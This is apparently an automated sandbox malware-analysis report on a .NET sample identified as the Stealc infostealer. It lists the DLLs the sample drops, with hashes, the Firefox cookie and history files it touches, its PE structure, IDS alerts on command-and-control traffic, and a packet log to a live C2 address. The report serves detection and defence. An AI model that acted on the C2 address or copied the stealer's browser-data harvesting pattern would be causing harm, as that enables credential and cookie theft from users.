Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........4......p.....................................................@A........................H...S...............x............F..P/.......#................................... ..................@............................text............................... ..`.rdata....... ......................@..@.data...<F...0......................@....00cfg..............................@..@.rsrc...x...........................@..@.reloc...#.......$..."..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\mozglue[1].dll

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	608080
Entropy (8bit):	6.833616094889818
Encrypted:	false
SSDEEP:	12288:BlSyAom/gcRKMdRm4wFkRHuyG4RRGJVDjMk/x21R8gY/r:BKgcRKMdRm4wFkVVDGJVv//x21R8br
MD5:	C8FD9BE83BC728CC04BEFFAFC2907FE9
SHA1:	95AB9F701E0024CEDFBD312BCFE4E726744C4F2E
SHA-256:	BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
SHA-512:	FBB446F4A27EF510E616CAAD52945D6C9CC1FD063812C41947E579EC2B54DF57C6DC46237DED80FCA5847F38CBE1747A6C66A13E2C8C19C664A72BE35EB8B040
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........^......................................................j.....@A.........................`...W.....,.... ..................P/...0...A...S..............................h.......................Z.......................text...a........................... ..`.rdata..............................@..@.data...D...........................@....00cfg..............................@..@.tls................................@....rsrc........ ......................@..@.reloc...A...0...B..................@..B................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\msvcp140[1].dll

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	450024
Entropy (8bit):	6.673992339875127
Encrypted:	false
SSDEEP:	12288:McPa9C9VbL+3Omy5CvyOvzeOKdqhUgiW6QR7t5s03Ooc8dHkC2esGAWf:McPa90Vbky5CvyUeOKn03Ooc8dHkC2eN
MD5:	5FF1FCA37C466D6723EC67BE93B51442
SHA1:	34CC4E158092083B13D67D6D2BC9E57B798A303B
SHA-256:	5136A49A682AC8D7F1CE71B211DE8688FCE42ED57210AF087A8E2DBC8A934062
SHA-512:	4802EF62630C521D83A1D333969593FB00C9B38F82B4D07F70FBD21F495FEA9B3F67676064573D2C71C42BC6F701992989742213501B16087BB6110E337C7546
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1C.._..._..._.)n...._......._...^."._..^..._..\..._..[..._..Z..._.._..._......_..]..._.Rich.._.........................PE..L.....0].........."!.....(..........`........@......................................,.....@A.........................g.......r...........................A.......=..`x..8............................w..@............p.......c..@....................text....&.......(.................. ..`.data...H)...@.......,..............@....idata.......p.......D..............@..@.didat..4............X..............@....rsrc................Z..............@..@.reloc...=.......>...^..............@..B................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\nss3[1].dll

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	2046288
Entropy (8bit):	6.787733948558952
Encrypted:	false
SSDEEP:	49152:fECf12gikHlnKGxJRIB+y5nvxnaOSJ3HFNWYrVvE4CQsgzMmQfTU1NrWmy4KoAzh:J7Tf8J1Q+SS5/nr
MD5:	1CC453CDF74F31E4D913FF9C10ACDDE2
SHA1:	6E85EAE544D6E965F15FA5C39700FA7202F3AAFE
SHA-256:	AC5C92FE6C51CFA742E475215B83B3E11A4379820043263BF50D4068686C6FA5
SHA-512:	DD9FF4E06B00DC831439BAB11C10E9B2AE864EA6E780D3835EA7468818F35439F352EF137DA111EFCDF2BB6465F6CA486719451BF6CF32C6A4420A56B1D64571
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................`........................................p......l- ...@A.........................&..........@....P..x...............P/...`..\...................................................\|...\....&..@....................text............................... ..`.rdata..l...........................@..@.data...DR..........................@....00cfg.......@......................@..@.rsrc...x....P......................@..@.reloc..\....`......................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\softokn3[1].dll

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	257872
Entropy (8bit):	6.727482641240852
Encrypted:	false
SSDEEP:	6144:/yF/zX2zfRkU62THVh/T2AhZxv6A31obD6Hq/8jis+FvtVRpsAAs0o8OqTYz+xnU:/yRzX2zfRkX2T1h/SA5PF9m8jJqKYz+y
MD5:	4E52D739C324DB8225BD9AB2695F262F
SHA1:	71C3DA43DC5A0D2A1941E874A6D015A071783889
SHA-256:	74EBBAC956E519E16923ABDC5AB8912098A4F64E38DDCB2EAE23969F306AFE5A
SHA-512:	2D4168A69082A9192B9248F7331BD806C260478FF817567DF54F997D7C3C7D640776131355401E4BDB9744E246C36D658CB24B18DE67D8F23F10066E5FE445F6
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................P...............................................Sg....@A........................Dv..S....w..........................P/.......5..8q...............................................{...............................text...&........................... ..`.rdata.............................@..@.data................\|..............@....00cfg..............................@..@.rsrc...............................@..@.reloc...5.......6..................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\vcruntime140[1].dll

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	80880
Entropy (8bit):	6.920480786566406
Encrypted:	false
SSDEEP:	1536:lw2886xv555et/MCsjw0BuRK3jteo3ecbA2W86b+Ld:lw28V55At/zqw+Iq9ecbA2W8H
MD5:	A37EE36B536409056A86F50E67777DD7
SHA1:	1CAFA159292AA736FC595FC04E16325B27CD6750
SHA-256:	8934AAEB65B6E6D253DFE72DEA5D65856BD871E989D5D3A2A35EDFE867BB4825
SHA-512:	3A7C260646315CF8C01F44B2EC60974017496BD0D80DD055C7E43B707CADBA2D63AAB5E0EFD435670AA77886ED86368390D42C4017FC433C3C4B9D1C47D0F356
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......................08e...................................................u............Rich............PE..L...\|.0].........."!.........................................................0.......m....@A.............................................................A... ....... ..8............................ ..@............................................text............................... ..`.data...............................@....idata..............................@..@.rsrc...............................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-shm

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
File Type:	data
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	0.017262956703125623
Encrypted:	false
SSDEEP:	3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
MD5:	B7C14EC6110FA820CA6B65F5AEC85911
SHA1:	608EEB7488042453C9CA40F7E1398FC1A270F3F4
SHA-256:	FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
SHA-512:	D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
Malicious:	false
Preview:	..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite-shm

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
File Type:	data
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	0.017262956703125623
Encrypted:	false
SSDEEP:	3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
MD5:	B7C14EC6110FA820CA6B65F5AEC85911
SHA1:	608EEB7488042453C9CA40F7E1398FC1A270F3F4
SHA-256:	FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
SHA-512:	D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
Malicious:	false
Preview:	..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\d3d9.dll

Download File

Process:	C:\Users\user\Desktop\f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	272896
Entropy (8bit):	6.785813762497204
Encrypted:	false
SSDEEP:	6144:XYaqOCMQK9syh0bxdWPhT917U4ji8U7kV:oaqOCMRyx2/fjn
MD5:	A16BFDD7C9F753A43F3EAA5522BA9D9D
SHA1:	36381482314AB4845531E4875C1FE520B50D1FE4
SHA-256:	E0B2AA87DAFB8977C806C5BFADA424E7DAE2E41995B8974D72EE455513262EA5
SHA-512:	FC700EF5A63F3CA9141991F9AEA64F1B5958C6895C27B1763791736219C0CDD8D033B9D4D7F9A4D435AB86A14C5EC4A12F69298BD7A9EE6FADE9EE98EFB1B846
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 79%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......C.)...GQ..GQ..GQL.DP..GQL.BP..GQL.CP..GQL.FP..GQ z<Q..GQ..FQe.GQ.=BP..GQ.=CP..GQ.=DP..GQ..GQ..GQj=GP..GQj=EP..GQRich..GQ........................PE..L.....bf...........!...&.N..........~........`...............................`............@.............................T...T...<............................@...... ...............................`...@............`..P............................text....M.......N.................. ..`.rdata...c...`...d...R..............@..@.data...\i.......`..................@....reloc.......@......................@..B................................................................................................................................................................................................................................................................................................................................

Static File Info

General

File type:	PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	6.415848356186701
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 50.01% Win32 Executable (generic) a (10002005/4) 49.96% Win16/32 Executable Delphi generic (2074/23) 0.01% Generic Win/DOS Executable (2004/3) 0.01% DOS Executable Generic (2002/1) 0.01%
File name:	f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe
File size:	474'624 bytes
MD5:	9c2b900d014ba5b9dfd0ca6cef201753
SHA1:	e5705841f68d9443ba5efb553aa9f87556e403e5
SHA256:	f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf317fab7b3e90281b5d05
SHA512:	5f92c1cff9312b100feca38c4ad8aa82af351d9ca01c420ed44f154fe8c1e3c9027fcffcf9578748601bc29708e8df0969bd4cdc1732a819fb37006a769b13d4
SSDEEP:	12288:4seLUscjnY6sJnCWH4UbmCJbbdKofwk/TsyVhpceSvbCq66imuXd6cWD/pWc0GMX:47U17
TLSH:	3FA4A89D766076DFC85BD0729AA81DB8FB5078BB431F4243902716ADAE5C89BCF140F2
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....bf.................j................... ....@.. ....................................@................................

File Icon


Icon Hash:	90cececece8e8eb0

Static PE Info

General

Entrypoint:	0x47c00a
Entrypoint Section:
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows cui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x6662E9C7 [Fri Jun 7 11:06:47 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Entrypoint Preview

Instruction
jmp dword ptr [0047C000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x307fc	0x4f	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x78000	0x6d8	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x7a000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x7c000	0x8
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x30000	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
A7B&<U	0x2000	0x2c594	0x2c600	02cd036eb91bd81e0b36971c82bf1b45	False	0.9998899647887324	data	7.998974089724877	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.text	0x30000	0x46730	0x46800	ec30b4931571fd884bfe8bc644b5b4eb	False	0.3267848238031915	data	4.520642074921792	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc	0x78000	0x6d8	0x800	468273f60eaf63ae5528e7b5d667ae35	False	0.36279296875	data	3.7387498824008096	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x7a000	0xc	0x200	e81a80c38992ec6b3b4d5dcfcfc5314a	False	0.044921875	data	0.09800417566270775	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
	0x7c000	0x10	0x200	7ca58d1a0a472541553b5df07f5e79fd	False	0.044921875	Applesoft BASIC program data, first line number 3	0.14263576814887827	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_VERSION	0x780a0	0x44c	data			0.4
RT_MANIFEST	0x784ec	0x1ea	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators			0.5469387755102041

Imports

DLL	Import
mscoree.dll	_CorExeMain

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
06/08/24-20:21:59.805841	TCP	2051828	ET TROJAN Win32/Stealc Active C2 Responding with browsers Config M1	80	49731	23.88.106.134	192.168.2.4
06/08/24-20:21:59.555146	TCP	2044244	ET TROJAN Win32/Stealc Requesting browsers Config from C2	49731	80	192.168.2.4	23.88.106.134
06/08/24-20:22:00.160152	TCP	2051831	ET TROJAN Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1	80	49731	23.88.106.134	192.168.2.4
06/08/24-20:21:58.692257	TCP	2044243	ET TROJAN [SEKOIA.IO] Win32/Stealc C2 Check-in	49731	80	192.168.2.4	23.88.106.134
06/08/24-20:21:59.902142	TCP	2044246	ET TROJAN Win32/Stealc Requesting plugins Config from C2	49731	80	192.168.2.4	23.88.106.134

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jun 8, 2024 20:21:58.686938047 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:21:58.691910028 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:21:58.691996098 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:21:58.692256927 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:21:58.697139025 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:21:59.553096056 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:21:59.553186893 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:21:59.555145979 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:21:59.561285019 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:21:59.805840969 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:21:59.805902958 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:21:59.806415081 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:21:59.902142048 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:21:59.912898064 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:00.160151958 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:00.160202980 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:00.160242081 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:00.160276890 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:00.160315990 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:00.160330057 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:00.160387993 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:00.160387993 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:00.160410881 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:00.211610079 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:00.211685896 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:00.220216990 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:00.220278025 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:00.220308065 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:00.220340967 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:00.224417925 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:00.224447012 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:00.228542089 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:00.496449947 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:00.496597052 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:00.740082979 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:00.749938011 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:00.995032072 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:00.995050907 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:00.995066881 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:00.995081902 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:00.995100021 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:00.995114088 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:00.995323896 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:00.995325089 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:00.995374918 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:00.995392084 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:00.995408058 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:00.995444059 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:00.995460987 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:00.995470047 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:00.995480061 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:00.995490074 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:00.995628119 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:00.995642900 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:00.995645046 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:00.995704889 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.118257046 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.118359089 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.118387938 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.118426085 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.118443012 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.118459940 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.118495941 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.118521929 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.118522882 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.118549109 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.118561029 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.118602037 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.118602991 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.118638992 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.118671894 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.118714094 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.118714094 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.118833065 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.119492054 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.119525909 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.119563103 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.119563103 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.119586945 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.119596958 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.119618893 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.119637966 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.119663954 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.119712114 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.120668888 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.120703936 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.120739937 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.120748997 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.120771885 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.120779991 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.120795012 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.120815992 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.120855093 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.120884895 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.121778011 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.121855974 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.121931076 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.121964931 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.121995926 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.122000933 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.122020006 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.122039080 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.122066975 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.122111082 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.122797012 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.122867107 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.242453098 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.242502928 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.242558002 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.242610931 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.242645025 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.242676973 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.242710114 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.242743015 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:01.242750883 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.242750883 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.242750883 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.242752075 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:01.242775917 CEST	80	49731	23.88.106.134	192.168.2.4
